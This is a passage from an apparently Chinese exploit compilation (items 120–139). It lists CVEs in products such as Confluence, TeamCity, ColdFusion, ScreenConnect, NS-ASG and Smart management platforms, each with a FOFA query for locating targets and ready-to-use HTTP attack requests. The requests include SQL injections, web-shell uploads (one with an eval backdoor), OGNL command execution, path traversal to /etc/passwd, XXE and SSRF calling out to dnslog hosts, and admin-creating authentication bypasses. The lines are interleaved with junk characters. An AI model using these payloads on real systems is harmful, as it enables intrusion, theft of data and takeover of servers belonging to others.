X-Remote-Addr: 1.1.1.1
! C+ D! U; Q4 z$ uTe: trailers
9 X# P/ T* @ d: v0 G$ ?7 i* v% uConnection: close9 D; S6 R, \ _# [
! h) o7 O i' _0 f' V
src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456! j/ [2 f. J( R* q/ `7 j+ C
4 x- P% H r( ~7 ?& a
! K3 t3 v: A7 M! T% P1 p& I
120. 北京百绰智能S40管理平台导入web.php任意文件上传# I( _) B" E5 q) @
CVE-2024-1253: m" _* c' y' J+ Y" J
FOFA:title="Smart管理平台"
. J8 ?) D0 r9 y2 `POST /useratte/web.php? HTTP/1.1
( s* Z3 r; e" M0 U8 FHost: ip:port# `& l" J% u% y( [/ j
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db# {4 M" f& z( X9 E( o6 g
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
& E: {2 k+ L+ D7 tAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8; ~2 y8 n; {9 _* s* ?! X) i
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.20 d. ]$ \& r2 u5 p) D* p* f# P
Accept-Encoding: gzip, deflate7 }! L: G, F8 a4 j# e' {+ I
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
8 j2 t# H& Y3 OContent-Length: 597" \) \( ] M& \; {
Origin: https://ip:port
% }! m1 ^7 x2 ~: @9 v/ kReferer: https://ip:port/sysmanage/licence.php
* T2 _, c. V$ U4 [0 h4 @8 v, EUpgrade-Insecure-Requests: 1
# m% H) x7 k+ A" R' fSec-Fetch-Dest: document$ ?9 s# f" k: r4 L3 l
Sec-Fetch-Mode: navigate
* J; _# P1 W' gSec-Fetch-Site: same-origin
, r6 p' ?# F) p" a: ]: y! oSec-Fetch-User: ?1
, R2 z$ ]* w' N/ g. i* d- qTe: trailers
' o& M9 H6 s: q$ ]4 V' O5 H: X* tConnection: close
, T0 D* {# d9 E! e6 k7 ^8 m- n t/ V1 e7 [; ]! q6 \
-----------------------------42328904123665875270630079328% P1 `5 `* u3 ?8 z$ F/ V9 L8 h( Z
Content-Disposition: form-data; name="file_upload"; filename="2.php"2 v" X% S' [7 G% f) l6 E
Content-Type: application/octet-stream
0 k$ o; [1 ?" g
6 j0 H* c5 {: x' y# P3 | D. S/ W<?php phpinfo()?>
, P V4 u" T/ y0 ?: E# I-----------------------------42328904123665875270630079328/ m+ g" b, F" p7 N1 o+ \
Content-Disposition: form-data; name="id_type"
( Q1 u& Y# B5 r
( t% B- a# \% M0 o% t# ?" _/ R1
, }: \& H8 J/ L3 [! L-----------------------------423289041236658752706300793280 W2 Y7 W( D7 U# @+ j
Content-Disposition: form-data; name="1_ck"- `1 E! V# q/ R* A4 O! A! o
$ C; K; M/ B6 j4 e+ z! V1_radhttp0 t6 S S: S- w: @: Z$ `, a0 q
-----------------------------42328904123665875270630079328/ z* c2 S3 g, {9 F8 t
Content-Disposition: form-data; name="mode": t, \4 r" B1 G' L
/ N6 K6 g E; d, [import
, j0 W+ V y- d+ [-----------------------------42328904123665875270630079328) A7 y" x9 W8 ?/ l& b9 M5 S/ Q
. l' g/ v6 J0 K/ e3 S& g- m5 ]+ [# \ S: p
文件路径/upload/2.php
4 O4 [3 f4 ?; U6 `3 Z+ p
' O' K" R* ]) V2 ^' [$ y* s121. 北京百绰智能S42管理平台userattestation.php任意文件上传
4 i) t% E \/ I( I) f8 ICVE-2024-1918
0 n j, O. y4 l" B. T+ iFOFA:title="Smart管理平台"
! Q& H! l; \$ \7 \0 s. z8 dPOST /useratte/userattestation.php HTTP/1.1# R7 K. q, ~8 Z5 P$ F( Q9 C
Host: 192.168.40.130:8443
2 k- x- G/ L F# c0 u) {Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac500 h5 J: E8 _1 s: e
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko9 N; \4 P) G% d( c# o
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.89 f) z1 @( w* o8 K
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 z8 r1 q e* K5 @: e, AAccept-Encoding: gzip, deflate
5 b/ R/ r; s T9 D9 EContent-Type: multipart/form-data; boundary=---------------------------423289041236658752706300793287 d }: g3 }2 w6 s
Content-Length: 592" M( B/ U% h& i, D1 O g [
Origin: https://192.168.40.130:84439 D R& B4 k1 u1 o7 ?/ u/ F
Upgrade-Insecure-Requests: 1
2 Y9 `9 {, {8 |! [ d: U! n% _Sec-Fetch-Dest: document/ D* [$ ^; h% F0 x& S
Sec-Fetch-Mode: navigate
6 s5 b( E6 m) V2 L8 q k7 S7 iSec-Fetch-Site: same-origin) `3 g% ^! G7 ?8 ?: b
Sec-Fetch-User: ?1
4 x" Q* r. W* c! dTe: trailers
6 d# I- N- g; g/ L5 m$ yConnection: close" _/ B. F, {4 p' ~$ k( o/ w9 ?2 h
4 y5 ]# j s2 r$ V; i2 T
-----------------------------423289041236658752706300793280 }; Y B- z1 U [
Content-Disposition: form-data; name="web_img"; filename="1.php"! O5 m5 S% j: J: \" I! a
Content-Type: application/octet-stream- a# z" A1 t- G
+ H" X9 `/ S% k, A
<?php phpinfo();?>
+ H: N* a+ p$ L( p3 Q( q-----------------------------42328904123665875270630079328
2 Q. ?9 w1 F* z4 P; FContent-Disposition: form-data; name="id_type"
3 f6 r. j8 L/ M. g& c
# O3 e7 V, e; c1
, q. d' y3 g3 r% Z-----------------------------423289041236658752706300793281 T- S1 T0 Y2 a; D4 L
Content-Disposition: form-data; name="1_ck"
: e+ v* d, Q, k1 w! q2 M
5 N% t/ D5 p& P j3 p& i5 e1_radhttp
0 |. Q! p) y2 I: W9 l9 d-----------------------------42328904123665875270630079328) P. C6 y9 s9 L* U1 a$ `' B
Content-Disposition: form-data; name="hidwel"
. U7 D; C- W" d5 r/ L8 a; B2 Z( Y8 T0 {5 V. n/ n) p7 Q
set+ e0 ]0 L. v8 `" a) k/ _! X
-----------------------------42328904123665875270630079328 U1 }0 L- r h
* a7 ]+ u7 J) o6 H
$ S3 j* z3 i/ G
boot/web/upload/weblogo/1.php9 q" R4 j2 i' K S# H+ S% |
. ?9 ]: d- ?& w1 N" N: y122. 北京百绰智能s200管理平台/importexport.php sql注入
7 X' i3 P4 P& v& v( y, f( k5 b1 V/ _CVE-2024-27718FOFA:title="Smart管理平台"/ ^, j( o; d0 }6 |8 }8 s- P
其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()
# ^( ^& D6 S. F+ ^; b& u/ b' H }GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
* p( Z/ q- ^2 X; DHost: x.x.x.x" K/ K6 W% g% R+ j2 W1 Y
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
$ e% U6 T" G! x$ y3 C3 c. mUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.01 W7 d& o/ U( t
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
) O; ~7 H9 R7 h) Q6 r. uAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
2 C' f1 s0 W! G0 {0 K$ T" }Accept-Encoding: gzip, deflate, br9 B, {5 y* e, S. b p& S$ I
Upgrade-Insecure-Requests: 1
9 n; C" M6 ?- T# `' _* pSec-Fetch-Dest: document
4 f) c$ w; f" Q# M7 d# e/ q4 q1 D5 ^Sec-Fetch-Mode: navigate
- q# E# J5 d; p) z# b5 W6 B6 }# JSec-Fetch-Site: none
' A( G3 y# i% W8 ^( A, ZSec-Fetch-User: ?1
q5 ]9 k( x7 @2 _0 I5 DTe: trailers
; I7 n) E+ s! w" MConnection: close5 Y9 h i, o) Z. a! A S* P
3 [6 x8 {: V, `2 J( t9 v: {3 X) Q+ }8 G
/ X) G7 W% ~+ Y123. Atlassian Confluence 模板注入代码执行' r, G+ B* [2 U7 f- g# A
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"' R# q7 B9 e3 c, y* Z) y
POST /template/aui/text-inline.vm HTTP/1.1& Y& B. Y) _+ i
Host: localhost:8090
' a9 @) Q% {: ]/ LAccept-Encoding: gzip, deflate, br- p: J2 }4 q/ W, h/ i6 I. u
Accept: */*# K4 o0 V+ K4 g9 y& l( I q
Accept-Language: en-US;q=0.9,en;q=0.8
: _( f% I! z7 eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
' y. Z# A! v- @Connection: close
$ Y H* o# n. G' |7 |Content-Type: application/x-www-form-urlencoded' y8 r1 n, t$ |& w0 g
2 m! R! S' V: ^5 t& N* [1 G" e1 Q
label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))
4 d) l1 _/ d) w* N2 w( M
h1 J0 U8 n3 |9 ^/ u! ? T7 z0 K; N
124. 湖南建研工程质量检测系统任意文件上传
- X! ]/ o+ _" d; o" M% kFOFA:body="/Content/Theme/Standard/webSite/login.css"$ S; M$ D% o2 f7 F3 h. X) H
POST /Scripts/admintool?type=updatefile HTTP/1.1
|( N5 ]7 ]" Z2 p8 O6 ?Host: 192.168.40.130:8282
* A0 l6 Q( C. T2 J( O/ tUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
) b# v; m! _3 ^2 i1 O7 N- CContent-Length: 72
" w6 { A' S- I$ oAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
- j8 q; N9 F; Q+ sAccept-Encoding: gzip, deflate, br$ f5 U* D7 R4 D$ u- Y6 }* J S
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 n) x$ f& h2 zConnection: close
; z- s& E. ]5 t" HContent-Type: application/x-www-form-urlencoded- i9 q/ s& Z7 A! C; n2 h4 B" g
! Z! x7 E' b) t1 p
filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>
0 f* @* y( _! N2 e' I- j" T: g/ h$ f
. Z8 c3 A9 h3 B$ u# t
http://192.168.40.130:8282/Scripts/abcgcg.aspx
2 S, ?9 P: j7 q$ a* U* P* q# P% v% o2 |
125. ConnectWise ScreenConnect身份验证绕过" n: ]9 r% r3 `4 v6 k
CVE-2024-1709% H# {# h) Q) z! y: a3 d
FOFA:icon_hash="-82958153"
2 N+ C- c+ j5 V$ V$ phttps://github.com/watchtowrlabs ... bypass-add-user-poc. u5 o1 J% l+ q- Q% ?4 t
j5 I' ?9 L4 @9 R" @# f/ X( ~9 N! ^
使用方法4 w% c8 d% E1 W- ~! [1 U) Z
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!
) v/ d/ R; U2 m# e6 [1 ^+ K m, Z
; Z, I7 G3 O$ ]- {$ p6 \% B/ a2 g9 d% _: o7 X9 M. }3 B
创建好用户后直接登录后台,可以执行系统命令。
( S9 s4 V/ ], w: c' W& z
# h0 q" w" n7 K! V126. Aiohttp 路径遍历
& P1 z+ w" a8 r) bFOFA:title=="ComfyUI"+ a- M j) @5 e7 M& k4 ~7 s! S
GET /static/../../../../../etc/passwd HTTP/1.1
8 r. a2 U3 u5 ?Host: x.x.x.x
% d/ V$ o+ i8 n; @: |' ]User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36" y/ x+ F1 N. [9 s
Connection: close
% h+ {4 }3 X7 v" l5 W) U: IAccept: */*
3 I3 e# E8 }# V+ o: ^Accept-Language: en3 n% Q: Y' @( r# r' k( y- g$ S
Accept-Encoding: gzip0 ^: v& w* z) q9 p) Q
6 z' s& s+ s9 y2 u2 n5 L6 M
0 [& ~. P; x4 y/ ?6 Z4 K* ~
127. 广联达Linkworks DataExchange.ashx XXE/ I1 C4 Y# r+ f
FOFA:body="Services/Identification/login.ashx"
5 s5 o Y- f! p0 Z: W& l- O- GPOST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
5 P' z0 q% q9 ^( k" {5 U yHost: 192.168.40.130:8888: o; `$ ]$ S6 N, k! W- R0 l7 Q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
/ g1 T: y1 k; ]& i+ J$ CContent-Length: 415/ H1 r4 z) i0 z8 u& w
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 s1 R- i; _) T
Accept-Encoding: gzip, deflate% u, o1 {& ?5 Y" y7 H
Accept-Language: zh-CN,zh;q=0.9
6 O0 C( v' y6 r3 p: M/ b% p/ tConnection: close% m+ x! w% ^5 |) c+ l
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0/ D3 S b8 c7 M: W, S
Purpose: prefetch& G+ \6 U6 Q% H) C1 F i3 d% Z- i
Sec-Purpose: prefetch;prerender
2 o- H, c3 a6 r4 [# H/ R% I' A
7 v3 f4 c! f9 b; G0 {------WebKitFormBoundaryJGgV5l5ta05yAIe0
1 u) i3 u0 t0 \Content-Disposition: form-data;name="SystemName"
) y( |% B/ D F' q. `3 ^ ]" M, n+ {( \( s' R
BIM
n& l- C/ o4 F1 [# U0 y------WebKitFormBoundaryJGgV5l5ta05yAIe0
5 W' {) _. A% s* b. F: eContent-Disposition: form-data;name="Params"' \, k* E$ s4 a+ [
Content-Type: text/plain
D- z9 q" k; {* G( B; a3 V$ j; w( a& Q' r# e
<?xml version="1.0" encoding="UTF-8"?>
: H9 e& z/ v" y! W9 e# Z<!DOCTYPE test [( f+ w/ G q! e+ v0 P
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw"> |/ I" f7 ^. c3 C% l
]
, N0 u$ q/ C/ I5 ^8 B% |>& G1 {- Z4 `( \7 \# X o5 y
<test>&t;</test>
* w. b% s, L" }------WebKitFormBoundaryJGgV5l5ta05yAIe0--
6 f) O; I ]/ y' I3 }, s- C Y3 Y4 w$ B2 p# r( |8 |
) g$ Z2 b' [! |9 ?
) V% \( \: j3 e. C9 V% P' D- j5 H) ]
128. Adobe ColdFusion 反序列化
; D; _7 @3 Z; ~3 Y4 G4 f' E* O7 dCVE-2023-38203
5 m3 v- ^0 i) P. x0 cAdobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)
6 p; ^7 ?8 v! Q( KFOFA:app="Adobe-ColdFusion": t2 p5 ]" k' {' g6 A I% K
PAYLOAD
% e0 a* i1 \- ~/ `+ v
% c) w* E4 T4 P4 ~129. Adobe ColdFusion 任意文件读取4 o! G) p+ _+ w. C- W7 p- D% o% _
CVE-2024-20767
4 j2 u* D" C! {' e6 G; l2 @FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"# }7 y' V8 w/ B/ O! L
第一步,获取uuid
7 k2 g q. C4 i% X) ^GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
0 i/ n9 p. T' E3 p5 ^Host: x.x.x.x; M1 v+ U: @3 L# p2 f* {4 e
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36& l- O @, v- I1 v+ d1 O9 R' _3 f
Accept: */*
y- b$ o0 p4 a. Y7 s4 A* dAccept-Encoding: gzip, deflate+ S7 }. p: @8 l; Q
Connection: close7 n: t7 d. T; f& d" w# U. }- ~
! ~, T1 k! N7 ]" o% A' ^3 T7 M1 u B9 F, x- g
第二步,读取/etc/passwd文件
' R7 D, o# ~- c9 }3 {GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
- l3 w2 o' I1 f6 A8 f8 YHost: x.x.x.x" m. S; [* d0 V0 S. ~" L9 `9 p
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
9 ^" _" O9 ~* @# p. @; v$ S: WAccept: */*
& x X5 N( e; d% OAccept-Encoding: gzip, deflate
* }$ F: b) D- m" jConnection: close
; w2 Z" T* e& k8 luuid: 85f60018-a654-4410-a783-f81cbd5000b90 }# S6 l( F& k1 `: P. b
# `( |. X2 z0 ^6 R" B
' V$ o! p5 j& U130. Laykefu客服系统任意文件上传" u: G* t+ {: s$ Y" h
FOFA:icon_hash="-334624619"* H% h, y* E' l/ a, j) }, n" H
POST /admin/users/upavatar.html HTTP/1.10 P E, n5 j1 P' j4 Q/ }
Host: 127.0.0.1" x6 B1 \9 \( e* r0 u, T# l
Accept: application/json, text/javascript, */*; q=0.01
( `2 b% ?, b+ l2 @2 B% c- g, LX-Requested-With: XMLHttpRequest1 n& l8 u h# `( m0 ~
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
( G9 z [; m' h& Q0 b; w. a KContent-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR8 o# C* W' \' f: F, l( B: Z
Accept-Encoding: gzip, deflate* k' F/ X' p3 O
Accept-Language: zh-CN,zh;q=0.9: z0 O; @7 P3 H# K
Cookie: user_name=1; user_id=3
" g( Z- Z0 j- G7 YConnection: close' c9 x# [' y- t' o( k
) A' M T% j* h2 Q. C
------WebKitFormBoundary3OCVBiwBVsNuB2kR
7 [/ W; U/ A/ y0 x, T% ?Content-Disposition: form-data; name="file"; filename="1.php"9 R2 E* B) v8 B6 u4 Z+ G ]2 \
Content-Type: image/png0 @* B% ?! L3 j0 n8 q7 G2 V) f" V3 }
* Y3 Z! x7 r( z$ c0 \( `
<?php phpinfo();@eval($_POST['sec']);?>; P- U; c" L" ^
------WebKitFormBoundary3OCVBiwBVsNuB2kR--
+ j" _% y3 Y p7 @6 j
" q4 p$ b5 S8 ]; b4 e; f" t
9 ^6 k4 d! r, V( I8 ~131. Mini-Tmall <=20231017 SQL注入' L, ~; ^% k3 Y q5 c1 H, i& Z
FOFA:icon_hash="-2087517259"/ N5 ?3 m, r( T8 ?
后台地址:http://localhost:8080/tmall/admin
, R: v% @& _* W7 Q# V9 _http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)
: q& U" G8 i6 c6 c
, m3 Q7 B; f2 E9 x( v132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
3 K6 ^9 L8 w, z7 D. h7 |CVE-2024-27198
9 X6 V0 h4 }) o! s2 vFOFA:body="Log in to TeamCity"
7 E! i9 b0 ?, V6 rPOST /pwned?jsp=/app/rest/users;.jsp HTTP/1.11 |( T1 f' W5 B$ E1 D
Host: 192.168.40.130:8111* [7 J( W0 \' _: ]7 o
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36; P5 x% H. \5 @
Accept: */*6 C5 {; U4 u; m5 m$ g
Content-Type: application/json" B( c' t! x9 ]
Accept-Encoding: gzip, deflate
0 R: j% M* K# B* H' l5 t+ p2 k9 K6 J3 {9 j. h* l6 j, f! s4 }
{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}4 z+ i1 X4 b& `" l& {
. m e* _; h% a" {+ e$ j9 r
1 P, Q9 M+ r7 \0 V9 q$ v) ECVE-2024-271992 m( r7 }4 Y: [- x g$ R$ Y
/res/../admin/diagnostic.jsp
, v( S+ r `4 R1 H C; Q/.well-known/acme-challenge/../../admin/diagnostic.jsp
( L' A' e/ K) y* u3 o/update/../admin/diagnostic.jsp
' _$ Q8 C' M, d& R
1 Z6 y+ @8 B% B" u" s2 D) w1 W7 q9 e& Q4 W3 D3 D1 q! D% f0 s
CVE-2024-27198-RCE.py
& I* _$ \4 k% T% {- J" H0 n$ w5 \( t9 m! u9 e
133. H5 云商城 file.php 文件上传6 ]5 b A( h' h6 y9 J, X# ^
FOFA:body="/public/qbsp.php"8 n* \. A1 p9 }) I4 L
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1& C# w. ?1 Y- k, d: S" A
Host: your-ip' Q8 P% o, A0 ~
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
; I9 f' b% I; n; I7 j, yContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx
& X1 ?( O6 z9 T* ^: J; l+ t" O0 |( T: e+ r* v. V6 l. \
------WebKitFormBoundaryFQqYtrIWb8iBxUCx
* U4 T9 X, V8 s1 L+ O& IContent-Disposition: form-data; name="file"; filename="rce.php"
, J# ~ L# I4 C+ j7 oContent-Type: application/octet-stream
% w: ?" |( Q% \) K" U" V : s: T$ ^$ B9 o
<?php system("cat /etc/passwd");unlink(__FILE__);?>
# T j# J/ e! ^1 G2 _) r' \------WebKitFormBoundaryFQqYtrIWb8iBxUCx--
8 Q; R6 A. \! ^7 \0 f; e- `4 {$ i! a0 s* q
; m/ H) s' C& {/ [5 `+ \8 \
; o4 Z0 V2 I& x# V: E. P0 J134. 网康NS-ASG应用安全网关index.php sql注入; a+ h8 d3 }+ Q& F
CVE-2024-2330
4 M/ Q$ o* L) w9 m$ K5 [Netentsec NS-ASG Application Security Gateway 6.3版本2 c# c6 T- c) d+ d1 x. C! y/ F
FOFA:app="网康科技-NS-ASG安全网关"* x: W5 g! Q2 w, Y& @
POST /protocol/index.php HTTP/1.1
: n* }# H6 P( q3 G+ y3 pHost: x.x.x.x% v* N% s# T7 ~# o6 {- [: o& G
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de/ h* \" T) H4 w; Z+ I
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
- j' v4 S& Q9 ~Accept: */*5 r Q3 h$ ~$ l
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
, G- ]& `$ g. T" K+ y" |3 UAccept-Encoding: gzip, deflate
3 ~0 v# ?. |6 LSec-Fetch-Dest: empty
9 B3 i* _' X- q$ B9 m3 A5 @5 e# k9 @Sec-Fetch-Mode: cors
$ ]- n3 ]% g/ `Sec-Fetch-Site: same-origin
$ {' X' h; [# ^2 lTe: trailers7 i$ n/ d* w6 z4 m+ X6 d
Connection: close' a( f, i/ d# i& r, F
Content-Type: application/x-www-form-urlencoded
( ?8 H1 A* c; i& J6 C4 zContent-Length: 263% ~; W% W" x0 @( C
# b Z/ [ L U$ o- q/ ?
jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}
/ V7 E) k3 C6 ]) x( [0 B$ F0 p# n5 { U6 {. T- I5 u2 K
/ r5 x0 P" y' T) f
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
1 X% j8 Z' E' V2 M4 gCVE-2024-2022
9 |' g2 h `5 |. S* ~! c7 j/ |6 RNetentsec NS-ASG Application Security Gateway 6.3版本4 e- a6 \" u" @8 x$ b0 \( U' S
FOFA:app="网康科技-NS-ASG安全网关"2 j; e, O- ]8 A* C, h8 H8 q% X
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.15 q6 @+ @3 r# r
Host: x.x.x.x' n* A" @, g' [( l% R) c9 E& Q& g3 B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
9 e. l9 A0 x$ _2 u/ Z- oAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.76 ~+ d" N# E7 X# h( y( R
Accept-Encoding: gzip, deflate# g. V9 `$ R& U* o* Q
Accept-Language: zh-CN,zh;q=0.9
0 R8 E! p2 {: a: [) q' S7 sConnection: close7 M; _+ H, @3 \) }+ S( Z4 L
2 r8 A5 ^6 {- b; ~: ^
* Z) r1 ?* c0 Z+ l- C0 E136. NextChat cors SSRF
. S% o7 u, T, _8 ~+ `CVE-2023-497850 a' v3 G4 t- G
FOFA:title="NextChat"
( N! W! Z; t/ s8 Y5 [- d8 ?GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
2 x9 G0 A+ P X! i8 O/ RHost: x.x.x.x:10000 J9 X8 r, U: Z$ {
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36' u* K Z2 w! Y8 n# @' Z
Connection: close. Q! r# S. a! J: z) O9 w
Accept: */*/ Q; G* m: ?3 r! i5 n& w$ [
Accept-Language: en
8 h8 H/ D* c3 EAccept-Encoding: gzip# G8 M( D3 t* j& p S9 B# i0 ^0 V
, ?5 n/ [- e4 L
) V% G5 G# x N N, y) f; ?
137. 福建科立迅通信指挥调度平台down_file.php sql注入
5 }2 R) d- ^& J# @( \% {CVE-2024-2620
& r [9 A/ B, Z6 D; d0 [& l& ]FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"0 G( E4 X% x6 z% c: f
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
. ]2 `8 \9 k) U1 X8 V8 \( uHost: x.x.x.x( M' H2 L& Q. ]" d) ] g- d
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.05 H, K0 O- k' i( r# D3 w+ ?6 d
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+ r( V- ?, q6 z( xAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
$ Y* S- h6 f( v1 mAccept-Encoding: gzip, deflate, br5 N/ n/ G) e- c" x
Connection: close
7 G/ F- F5 m+ t" k, d# W2 K9 e5 Z8 rCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
9 m* @$ n) c: V* J2 H+ K& P# }Upgrade-Insecure-Requests: 1
. |/ d& P% j9 B- b1 n! j# n5 W% }, y; F% \! @" q# }
; D L( h# ]7 y1 ^! M
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
' P5 p8 F0 g# `( M) s1 {CVE-2024-2621
( B4 K- {# a$ W; s$ qFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
. [, X( B2 `, b3 S' K6 jGET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
1 i' {4 E. L' A C6 @Host: x.x.x.x& i% B, b9 m2 Z2 Q1 W1 b4 n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
3 ~ i+ g8 V- Z$ s! o2 l4 m1 |6 Y% rAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
5 f. o' [$ h4 s' e! `Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; z$ \" H/ K6 \, D9 @; `Accept-Encoding: gzip, deflate, br& X5 f$ m m1 y) Y
Connection: close
1 D( {- f- K2 I! N5 Z1 ~8 ~Upgrade-Insecure-Requests: 10 @! |; {: `# n m C
0 n3 P* \* \) s% Z% T
/ J" r9 u t* [
139. 福建科立讯通信指挥调度平台editemedia.php sql注入
* X, `: F1 D! CCVE-2024-2622: G( `0 w6 W# T. v4 ]& ~
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"/ ^0 A" O0 {& ?3 \7 |
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
